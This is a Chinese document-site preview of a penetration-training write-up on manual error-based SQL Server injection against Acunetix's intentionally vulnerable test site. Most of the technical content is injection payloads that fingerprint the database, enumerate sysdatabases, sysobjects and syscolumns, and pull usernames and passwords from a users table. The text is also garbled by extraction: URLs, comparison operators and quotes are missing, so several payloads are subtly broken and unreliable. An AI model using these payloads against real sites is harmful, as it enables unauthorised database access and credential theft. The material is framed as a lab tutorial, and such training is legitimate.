学员渗透录二十三sql server手工注入awvs测试站_第1页
学员渗透录二十三sql server手工注入awvs测试站_第2页
学员渗透录二十三sql server手工注入awvs测试站_第3页
学员渗透录二十三sql server手工注入awvs测试站_第4页
学员渗透录二十三sql server手工注入awvs测试站_第5页
已阅读5页,还剩2页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、学渗透找暗月,暗月欢迎你的加入!日期:2014 年 8 月 28 日学员渗透录二十三 SQL Server 手工注入 AWVS 测试站学员 ID:sunday3000 编辑 mOon(暗月)这是学员 sunday3000 第四篇文章了,这次是带来 awvs 官方测试的站,终于不用再打码,同学们也可以清晰地看到思路与手法咯,是不是很好咯。(广告: 学渗透找暗月,学代码审计找暗月 详情博客 )0x01 概 述Acunetix Web Vulnerability Scanner 是一款知名的网站及服务器漏洞扫描软件,为了让更多的人认识到 Web 应用漏洞的及 WVS 在

2、漏洞发现过程中发挥的积极作用,Acunetix 推出了一个具有漏洞的测试网站 /。今天利用这个测试站点来讲解一下手工注入。网站首页如图 1-1 所示。图 1-1 测试网站首页链接 /showforum.asp?id=0 的内容,如图 1-2 所示。暗月博客 1学渗透找暗月,暗月欢迎你的加入!日期:2014 年 8 月 28 日图 1-2 链接 id=0 的内容链接 /showthread.asp?id=1 的内容,如

3、图 1-3 所示。图 1-3 链接 id=1 的内容0x02 发现注入点在 URL 中添加号,出现报错,如图 2-1 所示。暗月博客 2学渗透找暗月,暗月欢迎你的加入!日期:2014 年 8 月 28 日图 2-1 号报错展示在URL 中写入 1-0,显示 id=1 的内容,如图 2-2 所示。图 2-2 id=1-0 的展示在URL 中写入 1-1,显示 id=0 的内容,如图 2-3 所示。暗月博客 3学渗透找暗月,暗月欢迎你的加入!日期:2014 年 8 月 28 日图 2-3 id=1-1 的展示综上所述,这个测试网站存在数字

4、型注入。0x03数据库基本信息获取0x04用户数据库名获取暗月博客 4sysdatabases 中存放了所有数据库名/当前使用的数据库id=1 and 1=(select db_name()/数据库版本id=1 and 1=(select version)学渗透找暗月,暗月欢迎你的加入!日期:2014 年 8 月 28 日0x05获取表名暗月博客 5sysobjects 中存放了所有表名/获取第一张表 threads?id=1 and 1=(select top 1 name from sysobjects where xtype=U

5、)/获取第二张表 users?id=1 and 1=(select top 1 name from sysobjects where xtype=U and name threads )/获取第三张表 forums?id=1 and 1=(select top 1 name from sysobjects where xtype=U and name threads andname users )/获取第一个用户数据库?id=1 and 1=(select top 1 name from master.sysdatabases where dbid4)/获取下一个用户数据库?id=1 and

6、1=(select top 1 name from master.sysdatabases where dbid4 and name acublog);/以此类推,可以获取全部用户数据库名学渗透找暗月,暗月欢迎你的加入!日期:2014 年 8 月 28 日0x06获取表users 的列名0x07获取表users 数据暗月博客 6由于是测试网站,很多数据感觉上不正常,通过与 SQLMAP 对比可以核实手工注入的正确性/获取第一个用户名?id=1 and 1=(select top 1 uname from users)syscolumns 中存放了所有列名/获取第一

7、列列名 uname?id=1 and 1=(select top 1 name from syscolumns where id =(select id from sysobjects wherename = users)/获取第二列列名 upass?id=1 and 1=(select top 1 name from syscolumns where id =(select id from sysobjects wherename = users) and name uname)/获取第三列列名 email?id=1 and 1=(select top 1 name from syscolumns where id =(select id from sysobjects wherename = users) and name unameand name upass)/以此类推,可以获取表 users 的全部列名/以此类推,可以获取全部表学渗透找暗月,暗月欢迎你的加入!日期:2

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论